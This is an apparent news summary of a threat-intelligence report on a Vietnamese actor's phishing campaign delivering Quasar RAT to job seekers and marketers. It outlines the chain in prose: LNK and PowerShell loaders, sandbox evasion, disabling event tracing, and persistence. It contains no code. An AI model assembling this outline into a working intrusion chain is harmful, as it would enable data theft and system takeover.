A recent discovery by the Cyble Research and Intelligence Lab (CRIL) has revealed a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor, targeting job seekers and digital marketing professionals. This campaign utilizes advanced tactics, such as the Quasar RAT, to gain full control over compromised systems.
The attack begins with spam emails containing phishing attachments, enticing recipients to open an archive file posing as a PDF document. Once the LNK file is executed, PowerShell commands download obfuscated scripts from external sources to evade detection in non-virtualized environments.
Upon verifying a clean environment, the attackers decrypt the payload using hardcoded keys, activating Quasar RAT to exfiltrate data and potentially deploy additional malware. The Vietnamese threat actor expanded their operations in July 2022, targeting digital marketing professionals with Ducktail malware and incorporating various types of malware and Malware-as-a-Service (MaaS) frameworks for scalability. This campaign is attributed to a Vietnamese threat group based on target selection, attack tools, and payload delivery.
The malware employs evasion techniques to avoid detection in virtual environments, using checks to identify sandboxed environments and triggering exceptions if detected. It then decrypts encoded strings and escalates privileges to ensure persistence in the infected system. The malware further evades detection by modifying key Windows functions, disabling event tracing, and encrypting sensitive data.
The final stage involves the deployment of Quasar RAT, adapted to reduce detectability and enable data theft and remote system control. Configured with specific parameters to avoid attribution and detection, Quasar RAT allows the threat group to operate with more anonymity.
Overall, this sophisticated multi-stage malware attack highlights the evolving tactics employed by cybercriminals to target job seekers and professionals in specific industries, emphasizing the importance of robust cybersecurity measures to defend against such threats. As cybersecurity experts continue to analyze and combat these malicious campaigns, vigilance and proactive defense strategies are crucial to safeguarding sensitive data and systems from cyber threats.